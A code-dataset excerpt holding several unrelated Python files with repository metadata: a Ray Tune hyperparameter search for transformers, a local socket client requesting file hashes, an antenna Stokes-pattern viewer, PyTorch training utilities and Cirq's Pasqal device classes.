plm_probability=data_args.plm_probability,
max_span_length=data_args.max_span_length,
)
else:
data_collator = DataCollatorForLanguageModeling(
tokenizer=tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability
)
training_args = TrainingArguments(
output_dir=tune.get_trial_dir(),
learning_rate=config["learning_rate"],
do_train=True,
do_eval=True,
evaluate_during_training=True,
# Run eval after every epoch.
eval_steps=(len(train_dataset) // config["per_gpu_train_batch_size"]) + 1,
# We explicitly set save to 0, and do checkpointing in evaluate instead
save_steps=0,
num_train_epochs=config["num_epochs"],
max_steps=config["max_steps"],
per_device_train_batch_size=config["per_gpu_train_batch_size"],
per_device_eval_batch_size=config["per_gpu_val_batch_size"],
warmup_steps=0,
weight_decay=config["weight_decay"],
logging_dir="./logs")
# Initialize our Trainer
tune_trainer = TuneTransformerTrainer(
model=model,
args=training_args,
data_collator=data_collator,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
prediction_loss_only=True,
# compute_metrics=compute_metrics,
)
if training_args.do_train:
model_path = (
model_args.model_name_or_path
if model_args.model_name_or_path is not None and os.path.isdir(model_args.model_name_or_path)
else None
)
tune_trainer.train(model_path=model_path)
if __name__ == "__main__":
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
config = {
        # The first three entries identify the model and task; the remaining keys define the search space
"model_name": model_args.model_name_or_path,
"task_name": "CLM",
"data_dir": "",
"per_gpu_val_batch_size": 32,
"per_gpu_train_batch_size": tune.choice([16, 32, 64]),
"learning_rate": tune.uniform(1e-5, 5e-5),
"weight_decay": tune.uniform(0.0, 0.3),
"num_epochs": tune.choice([2, 3, 4, 5]),
"max_steps": -1, # We use num_epochs instead.
"wandb": {
"project": "pbt_transformers",
"reinit": True,
"allow_val_change": True
}
}
logger.info(config)
scheduler = PopulationBasedTraining(
time_attr="training_iteration",
metric="eval_loss",
mode="min",
perturbation_interval=2,
hyperparam_mutations={
"weight_decay": lambda: tune.uniform(0.0, 0.3).func(None),
"learning_rate": lambda: tune.uniform(1e-5, 5e-5).func(None),
"per_gpu_train_batch_size": [16, 32, 64],
})
reporter = CLIReporter(
parameter_columns={
"weight_decay": "w_decay",
"learning_rate": "lr",
"per_gpu_train_batch_size": "train_bs/gpu",
"num_epochs": "num_epochs"
},
metric_columns=[
"eval_acc", "eval_loss", "epoch", "training_iteration"
])
analysis = tune.run(
train_transformer,
resources_per_trial={
"cpu": 1,
"gpu": 1
},
config=config,
num_samples=3,
scheduler=scheduler,
keep_checkpoints_num=3,
checkpoint_score_attr="training_iteration",
progress_reporter=reporter,
local_dir="./ray_results/",
name="tune_trans")
best_config = analysis.get_best_config(metric="eval_loss", mode="min")
print(best_config)
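# --- Hedged invocation sketch (illustrative; file paths are placeholders, flag
# names follow the dataclasses defined above plus standard TrainingArguments) ---
# python debias_lm_hps_tune.py \
#     --model_name_or_path gpt2 \
#     --train_data_file train.txt \
#     --eval_data_file eval.txt \
#     --do_train --do_eval \
#     --output_dir ./out --overwrite_output_dir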
| 38.210425
| 175
| 0.664477
| 2,475
| 19,793
| 5.071919
| 0.202424
| 0.020075
| 0.015136
| 0.020314
| 0.333307
| 0.300486
| 0.263284
| 0.204812
| 0.178125
| 0.162192
| 0
| 0.006436
| 0.24635
| 19,793
| 517
| 176
| 38.284333
| 0.835087
| 0.21548
| 0
| 0.089636
| 0
| 0.011204
| 0.203429
| 0.016628
| 0
| 0
| 0
| 0
| 0.002801
| 1
| 0.016807
| false
| 0.002801
| 0.039216
| 0
| 0.12605
| 0.002801
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869ee02cc744c1a084a226d08c1391e0d7881239
| 1,373
|
py
|
Python
|
checksums.py
|
pgp/RootHelperClientTestInteractions
|
6b9e9cc9f10eb2bf9b9dafa851ed56005f7666b5
|
[
"Apache-2.0"
] | 1
|
2019-05-04T12:29:41.000Z
|
2019-05-04T12:29:41.000Z
|
checksums.py
|
pgp/RootHelperClientTestInteractions
|
6b9e9cc9f10eb2bf9b9dafa851ed56005f7666b5
|
[
"Apache-2.0"
] | null | null | null |
checksums.py
|
pgp/RootHelperClientTestInteractions
|
6b9e9cc9f10eb2bf9b9dafa851ed56005f7666b5
|
[
"Apache-2.0"
] | null | null | null |
from net_common import *
import struct
import sys
def getDirHashOpts(withNames=False,
ignoreThumbsFiles=True,
ignoreUnixHiddenFiles=True,
ignoreEmptyDirs=True):
return bytearray([((1 if withNames else 0) +
(2 if ignoreThumbsFiles else 0) +
(4 if ignoreUnixHiddenFiles else 0) +
(8 if ignoreEmptyDirs else 0))])
if __name__ == "__main__":
sock = get_connected_local_socket()
path = encodeString('/dev/shm/exampleDir')
# path = encodeString('/dev/null')
sock.sendall(bytearray(b'\x0A')) # HASH request
# sock.sendall(bytearray(b'\x01')) # choose MD5 algorithm
sock.sendall(bytearray(b'\x06')) # choose SHA3-224 algorithm
sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files)
sock.sendall(struct.pack("@H", len(path))) # len of path as unsigned short
sock.sendall(path)
resp = sock.recv(1) # response first byte: \x00 OK or \xFF ERROR
if resp != b'\x00':
print("Error byte received, errno is:", struct.unpack("@i", sock.recv(4))[0])
        sys.exit(1)  # exit non-zero on protocol error
# print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size
print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size
sock.close()
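# --- Hedged cross-check sketch (illustrative): for a regular file, the
# daemon's SHA3-224 reply can be compared against a local hashlib digest.
# 'some_path' is a placeholder.
def local_sha3_224(some_path):
    import hashlib
    h = hashlib.sha3_224()
    with open(some_path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()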
| 40.382353
| 128
| 0.627822
| 170
| 1,373
| 5
| 0.505882
| 0.077647
| 0.070588
| 0.074118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043647
| 0.24909
| 1,373
| 33
| 129
| 41.606061
| 0.780795
| 0.255645
| 0
| 0
| 0
| 0
| 0.072277
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.12
| 0.04
| 0.2
| 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a15534f296338602eb17c7dad23025e0241a4e
| 3,208
|
py
|
Python
|
scripts/viewStokespat.py
|
David-McKenna/AntPat
|
45618659994b27e2654f1effd6d9baa15867b6d3
|
[
"ISC"
] | 5
|
2016-06-21T14:54:23.000Z
|
2021-04-06T06:23:25.000Z
|
scripts/viewStokespat.py
|
David-McKenna/AntPat
|
45618659994b27e2654f1effd6d9baa15867b6d3
|
[
"ISC"
] | null | null | null |
scripts/viewStokespat.py
|
David-McKenna/AntPat
|
45618659994b27e2654f1effd6d9baa15867b6d3
|
[
"ISC"
] | 2
|
2019-10-25T03:16:06.000Z
|
2020-11-15T14:18:46.000Z
|
#!/usr/bin/env python
"""A simple viewer for Stokes patterns based on two far-field pattern files.
(Possibly based on one FF pattern files if it has two requests: one for each
polarization channel.)"""
import os
import argparse
import numpy
import matplotlib.pyplot as plt
from antpat.reps.sphgridfun.tvecfun import TVecFields
from antpat.radfarfield import RadFarField
from antpat.dualpolelem import DualPolElem
FEKOsuffix = 'ffe'
GRASPsuffix = 'swe'
NECsuffix = 'out'
def Jones2Stokes(Jones):
"""Convert Jones matrix to Stokes vector. This assumes dual-pol antenna receiving unpolarized unit
valued radiation i.e. incoming Stokes = (1,0,0,0)."""
brightmat = numpy.matmul(Jones, numpy.swapaxes(numpy.conjugate(Jones),-1,-2))
StokesI = numpy.real(brightmat[...,0,0]+brightmat[...,1,1])
StokesQ = numpy.real(brightmat[...,0,0]-brightmat[...,1,1])
StokesU = numpy.real(brightmat[...,0,1]+brightmat[...,1,0])
StokesV = numpy.imag(brightmat[...,0,1]-brightmat[...,1,0])
return StokesI, StokesQ, StokesU, StokesV
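# Hedged numeric check (illustrative): with the convention in Jones2Stokes, an
# identity Jones matrix receiving unpolarized unit radiation gives I=2 and
# Q=U=V=0.
assert Jones2Stokes(numpy.eye(2)) == (2.0, 0.0, 0.0, 0.0)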
def plotStokes_fromFEKOfiles(p_chan_file, q_chan_file, freq):
(tvf_p, tvf_q) = (TVecFields(), TVecFields())
tvf_p.load_ffe(p_chan_file)
tvf_q.load_ffe(q_chan_file)
(ant_p, ant_q) = (RadFarField(tvf_p), RadFarField(tvf_q))
(p_chan_name, q_chan_name) = (os.path.basename(p_chan_file), os.path.basename(q_chan_file))
(ant_p.name, ant_q.name) = (p_chan_name, q_chan_name)
dualpolAnt = DualPolElem(ant_p, ant_q)
THETA, PHI, Jones = dualpolAnt.getJonesPat(freq)
(StokesI, StokesQ, StokesU, StokesV) = Jones2Stokes(Jones)
x = THETA*numpy.cos(PHI)
y = THETA*numpy.sin(PHI)
#x= THETA
#y=PHI
xyNames = ('theta*cos(phi)','theta*sin(phi)')
fig = plt.figure()
ax1 = fig.add_subplot(221)
plt.pcolormesh(x, y, 10*numpy.log10(StokesI), label="I")
#plt.pcolormesh(x, y, StokesI, label="I")
plt.colorbar()
ax1.set_title('I (dB)')
ax2 = fig.add_subplot(222)
plt.pcolormesh(x, y, StokesQ/StokesI, label="Q")
plt.colorbar()
ax2.set_title('Q/I')
ax3 = fig.add_subplot(223)
plt.pcolormesh(x, y, StokesU/StokesI, label="U")
plt.colorbar()
ax3.set_title('U/I')
ax4 = fig.add_subplot(224)
plt.pcolormesh(x, y, StokesV/StokesI, label="V")
plt.colorbar()
ax4.set_title('V/I')
fig.suptitle('Stokes (azimuthal-equidistant proj) @ ' +str(freq/1e9)+' GHz')
plt.show()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("p_chan_file",
help='Filename of polarization channel p')
parser.add_argument("q_chan_file",
                        help='Filename of polarization channel q')
parser.add_argument("freq", nargs='?', type=float,
help="Frequency in Hertz")
args = parser.parse_args()
if args.p_chan_file.endswith(FEKOsuffix):
plotStokes_fromFEKOfiles(args.p_chan_file, args.q_chan_file, args.freq)
elif args.p_chan_file.endswith(GRASPsuffix):
print("Not implemented yet.")
elif args.p_chan_file.endswith(NECsuffix):
print("Not implemented yet.")
else:
print("Far-field pattern file type not known")
exit(1)
| 36.044944
| 102
| 0.674564
| 457
| 3,208
| 4.582057
| 0.347921
| 0.049666
| 0.034384
| 0.035817
| 0.170487
| 0.148042
| 0.08596
| 0.08596
| 0.056351
| 0.056351
| 0
| 0.019399
| 0.180486
| 3,208
| 88
| 103
| 36.454545
| 0.777102
| 0.122818
| 0
| 0.119403
| 0
| 0
| 0.105866
| 0.007868
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029851
| false
| 0
| 0.104478
| 0
| 0.149254
| 0.044776
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a15d2cf1ab721951e4abf4f4b561d571ed4d1c
| 2,141
|
py
|
Python
|
utils.py
|
lingjiao10/Facial-Expression-Recognition.Pytorch
|
f5ba0e527347af3778d44eb7045e4970d01641a6
|
[
"MIT"
] | null | null | null |
utils.py
|
lingjiao10/Facial-Expression-Recognition.Pytorch
|
f5ba0e527347af3778d44eb7045e4970d01641a6
|
[
"MIT"
] | null | null | null |
utils.py
|
lingjiao10/Facial-Expression-Recognition.Pytorch
|
f5ba0e527347af3778d44eb7045e4970d01641a6
|
[
"MIT"
] | 1
|
2019-10-02T02:26:39.000Z
|
2019-10-02T02:26:39.000Z
|
'''Some helper functions for PyTorch, including:
- progress_bar: progress bar mimic xlua.progress.
- set_lr : set the learning rate
- clip_gradient : clip gradient
'''
import os
import sys
import time
import math
import torch
import torch.nn as nn
import torch.nn.init as init
from torch.autograd import Function
# Get the number of rows and columns of the terminal
if sys.platform == 'win32':
term_width = 80
else:
    # Read the terminal size once instead of spawning stty twice.
    _, term_width = os.popen('stty size', 'r').read().split()
    term_width = int(term_width)
TOTAL_BAR_LENGTH = 30.
last_time = time.time()
begin_time = last_time
#[==>........ 19/225 ...........] | Loss: 1.961 | Acc: 22.000% (537/2432)
def progress_bar(current, total, msg=None):
global last_time, begin_time
if current == 0:
begin_time = time.time() # Reset for new bar.
cur_len = int(TOTAL_BAR_LENGTH*current/total)
rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1
sys.stdout.write(' [')
for i in range(cur_len):
sys.stdout.write('=')
sys.stdout.write('>')
for i in range(rest_len):
sys.stdout.write('.')
sys.stdout.write(']')
cur_time = time.time()
step_time = cur_time - last_time
last_time = cur_time
tot_time = cur_time - begin_time
L = []
if msg:
L.append(' | ' + msg)
msg = ''.join(L)
sys.stdout.write(msg)
for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):
sys.stdout.write(' ')
# Go back to the center of the bar.
for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):
sys.stdout.write('\b')
sys.stdout.write(' %d/%d ' % (current+1, total))
if current < total-1:
sys.stdout.write('\r')
else:
sys.stdout.write('\n')
sys.stdout.flush()
def set_lr(optimizer, lr):
for group in optimizer.param_groups:
group['lr'] = lr
def clip_gradient(optimizer, grad_clip):
for group in optimizer.param_groups:
#print(group['params'])
for param in group['params']:
param.grad.data.clamp_(-grad_clip, grad_clip)
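# --- Hedged usage sketch (illustrative): drive the bar through one fake epoch
# with made-up loss values; run this module directly to see the output.
if __name__ == "__main__":
    total = 50
    for step in range(total):
        time.sleep(0.01)
        progress_bar(step, total, msg='Loss: %.3f' % (1.0 / (step + 1)))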
| 27.101266
| 76
| 0.604858
| 308
| 2,141
| 4.045455
| 0.327922
| 0.086677
| 0.123596
| 0.054575
| 0.250401
| 0.218299
| 0.138042
| 0.05939
| 0.05939
| 0.05939
| 0
| 0.021144
| 0.248949
| 2,141
| 78
| 77
| 27.448718
| 0.753731
| 0.148996
| 0
| 0.071429
| 0
| 0
| 0.034282
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.142857
| 0
| 0.196429
| 0.017857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a1bd490fa794c86a7ba173a9dce9709f3eb600
| 2,236
|
py
|
Python
|
string-method/src/analysis/FE_analysis/index_converter.py
|
delemottelab/gpcr-string-method-2019
|
b50786a4a8747d56ad04ede525592eb31f1890fd
|
[
"MIT"
] | null | null | null |
string-method/src/analysis/FE_analysis/index_converter.py
|
delemottelab/gpcr-string-method-2019
|
b50786a4a8747d56ad04ede525592eb31f1890fd
|
[
"MIT"
] | null | null | null |
string-method/src/analysis/FE_analysis/index_converter.py
|
delemottelab/gpcr-string-method-2019
|
b50786a4a8747d56ad04ede525592eb31f1890fd
|
[
"MIT"
] | 3
|
2020-03-16T04:33:50.000Z
|
2021-03-19T17:25:59.000Z
|
from __future__ import absolute_import, division, print_function
import logging
import sys
logging.basicConfig(
stream=sys.stdout,
level=logging.DEBUG,
format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
import numpy as np
import utils
logger = logging.getLogger("indexconverter")
class IndexConverter(object):
def __init__(self, ndim, ngrid):
self.ndim = ndim
self.ngrid = ngrid
self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)]
self._zerodim = np.zeros((self.ndim,))
self.nbins = int(np.rint((ngrid - 1) ** ndim))
def convert_to_vector(self, grid):
if grid.shape[0] != self.ngrid - 1:
raise Exception("Wrong dimension of grid. Expect length fo %s got %s" % (self.ngrid - 1, grid.shape[0]))
vector = np.empty((self.nbins,))
for bin_idx in range(self.nbins):
vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))]
return vector
def convert_to_grid(self, vector):
grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1))
if len(vector.shape) > 1:
grids = np.empty((len(vector),) + grid_shape)
for idx, v in enumerate(vector):
grids[idx] = self.convert_to_grid(v)
return grids
else:
grid = np.zeros(grid_shape)
for idx in range(len(vector)):
grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx]
return grid
def convert_to_grid_idx(self, bin_idx):
if bin_idx >= self.nbins or bin_idx < 0:
print(self.nbins, self.ndim, self.nbins ** self.ndim)
raise Exception("Invalid index %s. You are probably outside the grid..." % bin_idx)
grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1)
return grid_idx.astype(int)
def convert_to_bin_idx(self, grid_idx):
bin_idx = utils.rint(np.sum(grid_idx * self._modulus))
if bin_idx >= self.nbins or bin_idx < 0:
raise Exception(
"Invalid bin index %s. You are probably outside the grid. Size:%s" % (bin_idx, self.nbins))
return bin_idx
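# --- Hedged usage sketch (illustrative; assumes the module's own `utils`
# dependency is importable): round-trip every bin index of a 2-D grid with
# ngrid=4 points per axis, i.e. (ngrid - 1) ** ndim = 9 bins.
if __name__ == "__main__":
    conv = IndexConverter(ndim=2, ngrid=4)
    for b in range(conv.nbins):
        assert conv.convert_to_bin_idx(conv.convert_to_grid_idx(b)) == b
    logger.info("round-trip OK for %s bins", conv.nbins)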
| 38.551724
| 116
| 0.609123
| 315
| 2,236
| 4.155556
| 0.27619
| 0.064171
| 0.049656
| 0.038961
| 0.135982
| 0.135982
| 0.135982
| 0.091673
| 0.039725
| 0
| 0
| 0.007273
| 0.262075
| 2,236
| 57
| 117
| 39.22807
| 0.786061
| 0
| 0
| 0.040816
| 0
| 0
| 0.110465
| 0.010286
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102041
| false
| 0
| 0.102041
| 0
| 0.326531
| 0.040816
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a37502649b0fcb2349b60e7e2d86e82dd233f5
| 12,050
|
py
|
Python
|
cirq-pasqal/cirq_pasqal/pasqal_device.py
|
pavoljuhas/Cirq
|
b6d6577be61d216ce2f29f8c64ae5879cf3087d5
|
[
"Apache-2.0"
] | 1
|
2022-02-05T22:17:39.000Z
|
2022-02-05T22:17:39.000Z
|
cirq-pasqal/cirq_pasqal/pasqal_device.py
|
pavoljuhas/Cirq
|
b6d6577be61d216ce2f29f8c64ae5879cf3087d5
|
[
"Apache-2.0"
] | null | null | null |
cirq-pasqal/cirq_pasqal/pasqal_device.py
|
pavoljuhas/Cirq
|
b6d6577be61d216ce2f29f8c64ae5879cf3087d5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict
import numpy as np
import networkx as nx
import cirq
from cirq import _compat, GridQubit, LineQubit
from cirq.ops import NamedQubit
from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset
@cirq.value.value_equality
class PasqalDevice(cirq.devices.Device):
"""A generic Pasqal device.
The most general of Pasqal devices, enforcing only restrictions expected to
be shared by all future devices. Serves as the parent class of all Pasqal
devices, but can also be used on its own for hosting a nearly unconstrained
device. When used as a circuit's device, the qubits have to be of the type
cirq.NamedQubit and assumed to be all connected, the idea behind it being
that after submission, all optimization and transpilation necessary for its
execution on the specified device are handled internally by Pasqal.
"""
def __init__(self, qubits: Sequence[cirq.Qid]) -> None:
"""Initializes a device with some qubits.
Args:
qubits (NamedQubit): Qubits on the device, exclusively unrelated to
a physical position.
Raises:
TypeError: If the wrong qubit type is provided.
ValueError: If the number of qubits is greater than the devices maximum.
"""
if len(qubits) > 0:
q_type = type(qubits[0])
for q in qubits:
if not isinstance(q, self.supported_qubit_type):
raise TypeError(
'Unsupported qubit type: {!r}. This device '
'supports qubit types: {}'.format(q, self.supported_qubit_type)
)
if not type(q) is q_type:
raise TypeError("All qubits must be of same type.")
if len(qubits) > self.maximum_qubit_number:
raise ValueError(
'Too many qubits. {} accepts at most {} '
'qubits.'.format(type(self), self.maximum_qubit_number)
)
self.gateset = PasqalGateset()
self.qubits = qubits
self._metadata = cirq.DeviceMetadata(
qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b])
)
# pylint: enable=missing-raises-doc
@property
def supported_qubit_type(self):
return (NamedQubit,)
@property
def maximum_qubit_number(self):
return 100
@property
def metadata(self):
return self._metadata
@_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15')
def qubit_set(self) -> FrozenSet[cirq.Qid]:
return frozenset(self.qubits)
def qubit_list(self):
return [qubit for qubit in self.qubits]
def is_pasqal_device_op(self, op: cirq.Operation) -> bool:
if not isinstance(op, cirq.Operation):
raise ValueError('Got unknown operation:', op)
return op in self.gateset
def validate_operation(self, operation: cirq.Operation):
"""Raises an error if the given operation is invalid on this device.
Args:
operation: The operation to validate.
Raises:
ValueError: If the operation is not valid.
NotImplementedError: If the operation is a measurement with an invert
mask.
"""
if not isinstance(operation, cirq.GateOperation):
raise ValueError("Unsupported operation")
if not self.is_pasqal_device_op(operation):
raise ValueError(f'{operation.gate!r} is not a supported gate')
for qub in operation.qubits:
if not isinstance(qub, self.supported_qubit_type):
raise ValueError(
'{} is not a valid qubit for gate {!r}. This '
'device accepts gates on qubits of type: '
'{}'.format(qub, operation.gate, self.supported_qubit_type)
)
if qub not in self.metadata.qubit_set:
raise ValueError(f'{qub} is not part of the device.')
if isinstance(operation.gate, cirq.MeasurementGate):
if operation.gate.invert_mask != ():
raise NotImplementedError(
"Measurements on Pasqal devices don't support invert_mask."
)
def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None:
"""Raises an error if the given circuit is invalid on this device.
A circuit is invalid if any of its moments are invalid or if there
is a non-empty moment after a moment with a measurement.
Args:
circuit: The circuit to validate
Raises:
ValueError: If the given circuit can't be run on this device
"""
super().validate_circuit(circuit)
# Measurements must be in the last non-empty moment
has_measurement_occurred = False
for moment in circuit:
if has_measurement_occurred:
if len(moment.operations) > 0:
raise ValueError("Non-empty moment after measurement")
for operation in moment.operations:
if isinstance(operation.gate, cirq.MeasurementGate):
has_measurement_occurred = True
def __repr__(self):
return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})'
def _value_equality_values_(self):
return self.qubits
def _json_dict_(self):
return cirq.protocols.obj_to_dict_helper(self, ['qubits'])
class PasqalVirtualDevice(PasqalDevice):
"""A Pasqal virtual device with qubits in 3d.
A virtual representation of a Pasqal device, enforcing the constraints
typically found in a physical device. The qubits can be positioned in 3d
space, although 2d layouts will be supported sooner and are thus
recommended. Only accepts qubits with physical placement.
"""
def __init__(
self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]]
) -> None:
"""Initializes a device with some qubits.
Args:
control_radius: the maximum distance between qubits for a controlled
gate. Distance is measured in units of the coordinates passed
into the qubit constructor.
qubits: Qubits on the device, identified by their x, y, z position.
Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit.
Raises:
ValueError: if the wrong qubit type is provided or if invalid
parameter is provided for control_radius."""
super().__init__(qubits)
if not control_radius >= 0:
raise ValueError('Control_radius needs to be a non-negative float.')
if len(self.qubits) > 1:
if control_radius > 3.0 * self.minimal_distance():
raise ValueError(
'Control_radius cannot be larger than 3 times'
' the minimal distance between qubits.'
)
self.control_radius = control_radius
self.gateset = PasqalGateset(include_additional_controlled_ops=False)
self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate))
@property
def supported_qubit_type(self):
return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit)
def validate_operation(self, operation: cirq.Operation):
"""Raises an error if the given operation is invalid on this device.
Args:
operation: the operation to validate
Raises:
ValueError: If the operation is not valid
"""
super().validate_operation(operation)
# Verify that a controlled gate operation is valid
if operation in self.controlled_gateset:
for p in operation.qubits:
for q in operation.qubits:
if self.distance(p, q) > self.control_radius:
raise ValueError(f"Qubits {p!r}, {q!r} are too far away")
def validate_moment(self, moment: cirq.Moment):
"""Raises an error if the given moment is invalid on this device.
Args:
moment: The moment to validate.
Raises:
ValueError: If the given moment is invalid.
"""
super().validate_moment(moment)
if len(moment) > 1:
for operation in moment:
if not isinstance(operation.gate, cirq.MeasurementGate):
raise ValueError("Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.")
def minimal_distance(self) -> float:
"""Returns the minimal distance between two qubits in qubits.
Args:
qubits: qubit involved in the distance computation
Raises:
ValueError: If the device has only one qubit
Returns:
The minimal distance between qubits, in spacial coordinate units.
"""
if len(self.qubits) <= 1:
raise ValueError("Two qubits to compute a minimal distance.")
return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2])
def distance(self, p: Any, q: Any) -> float:
"""Returns the distance between two qubits.
Args:
p: qubit involved in the distance computation
q: qubit involved in the distance computation
Raises:
ValueError: If p or q not part of the device
Returns:
The distance between qubits p and q.
"""
all_qubits = self.qubit_list()
if p not in all_qubits or q not in all_qubits:
raise ValueError("Qubit not part of the device.")
if isinstance(p, GridQubit):
return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2)
if isinstance(p, LineQubit):
return abs(p.x - q.x)
return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)
def __repr__(self):
return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format(
self.control_radius, sorted(self.qubits)
)
def _value_equality_values_(self) -> Any:
return (self.control_radius, self.qubits)
def _json_dict_(self) -> Dict[str, Any]:
return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits'])
@_compat.deprecated_class(
deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).'
)
class PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates):
"""A gate converter for compatibility with Pasqal processors.
Modified version of ConvertToNeutralAtomGates, where a new 'convert' method
'pasqal_convert' takes the 'keep' function as an input.
"""
def pasqal_convert(
self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool]
) -> List[cirq.Operation]:
def on_stuck_raise(bad):
return TypeError(
"Don't know how to work with {!r}. "
"It isn't a native PasqalDevice operation, "
"a 1 or 2 qubit gate with a known unitary, "
"or composite.".format(bad)
)
return cirq.protocols.decompose(
op,
keep=keep,
intercepting_decomposer=self._convert_one,
on_stuck_raise=None if self.ignore_failures else on_stuck_raise,
)
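# --- Hedged usage sketch (illustrative; assumes CZ is in the Pasqal gateset,
# consistent with controlled_gateset above) ---
if __name__ == "__main__":
    qubits = [TwoDQubit(x, y) for x in range(3) for y in range(3)]
    device = PasqalVirtualDevice(control_radius=2.0, qubits=qubits)
    # Qubits at distance sqrt(2) are within the control radius, so this passes.
    device.validate_operation(cirq.CZ(TwoDQubit(0, 0), TwoDQubit(1, 1)))
    print("min distance:", device.minimal_distance())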
| 37.42236
| 99
| 0.630954
| 1,493
| 12,050
| 5.002009
| 0.229739
| 0.024371
| 0.01406
| 0.016872
| 0.201794
| 0.15225
| 0.118104
| 0.082217
| 0.061328
| 0.046599
| 0
| 0.005036
| 0.291452
| 12,050
| 321
| 100
| 37.538941
| 0.869642
| 0.326058
| 0
| 0.096154
| 0
| 0
| 0.151161
| 0.02495
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147436
| false
| 0
| 0.044872
| 0.083333
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a3efacb490990d88c7dfa47acc3b8f0d98c63a
| 22,798
|
py
|
Python
|
command_line/show.py
|
huwjenkins/dials
|
885a2f6ea3900dd0c9fcc15c03561fb45452c3bb
|
[
"BSD-3-Clause"
] | null | null | null |
command_line/show.py
|
huwjenkins/dials
|
885a2f6ea3900dd0c9fcc15c03561fb45452c3bb
|
[
"BSD-3-Clause"
] | 1
|
2019-06-03T16:09:12.000Z
|
2019-06-04T12:47:20.000Z
|
command_line/show.py
|
rjgildea/dials
|
0665a385d644bbef7541fb2d33c7a3c5a748e2b4
|
[
